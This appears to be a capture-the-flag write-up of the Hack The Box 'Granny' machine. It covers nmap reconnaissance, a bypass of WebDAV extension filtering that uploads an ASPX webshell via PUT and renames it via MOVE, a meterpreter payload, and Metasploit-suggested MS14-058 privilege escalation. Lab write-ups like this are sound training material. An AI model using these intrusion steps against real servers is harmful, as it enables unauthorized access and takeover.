search

Granny

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.15

80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 14 Dec 2023 02:17:01 GMT
|_  WebDAV type: Unknown


┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.15 
All 1000 scanned ports on 10.10.10.15 are in ignored states.

nmap shows only port 80 open. It’s a website, and the webdav-scan is particularly interesting (I’ll come back to that in a minute):

Enumeration: TCP 80

http://10.10.10.15/arrow-up-right

  • Operating systems: Windows Server

  • Web frameworks: Microsoft ASP.NET

  • Web servers: IIS 6.0

The site just says “Under Construction”

Headers: I’ll also check out the response header:

The X-Powered-By: ASP.NET tells me that aspx files may execute if I can get them onto target.

gobuster: I’ll start looking for paths on this server with gobuster, but it doesn’t find anything interesting:

Both /images and /_private are empty dirs.

WebDAV

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP. The scan shows that the HTTP PUT method is allowed. This could potentially give us the ability to save files on the web server. Since this is a Microsoft IIS web server, the type of files it executes are ASP and ASPX. So let’s check if we’re allowed to upload these file extensions.

Both ASP and ASPX are not allowed. However, TXT and HTML files are. Remember that the PUT HTTP method was not the only method that was allowed. We also can use the MOVE method. The MOVE method not only can be used to change file locations on the web server, but it can also be used to rename files. Let’s try to upload an HTML file on the web server and then rename it to change the extension to an ASPX file.

We confirm that the HTML file was correctly uploaded on the web server. Next, let’s change the extension of the HTML file to ASPX.

Foothold:

Upload Webshell: The first thing I’ll need to do is upload my webshell. Kali has a simple one at /usr/share/webshells/aspx/cmdasp.aspx. I’ll grab a copy:

Now I’ll upload that to target as a txt using curl and the http put method:

If I look at the page now, I’ll see the code, but it’s not executed, as the server is treating it as text:

http://10.10.10.15/shell.txt10.10.10.15chevron-right

Move Webshell: Now I’ll use the next webdav command, MOVE. Again, I can do this with curl:

Meterpreter: I’ll do the same thing with a meterpreter payload. Create it:

Start Metasploit:

Trigger it, and it fails:

http://10.10.10.15/shelly.aspxarrow-up-right

Why? If I upload shelly.txt again, I can see that the whitespace is all jacked up I’ll upload again, this time using --data-binary to preserve endlines and other control characters:

On refreshing shelly.txt, I see it looks much cleaner Now I’ll move the file and trigger it:

Privesc:

Enumeration:

On those older boxes, I am more likely to checkout local exploits, and Metasploit has a nice module for that, post/multi/recon/local_exploit_suggester:

MS14-058

I’ll pick one (somewhat at random, though I like this one as it says the target appears to be vulnerable):

PreviousBastardNextArtic

Last updated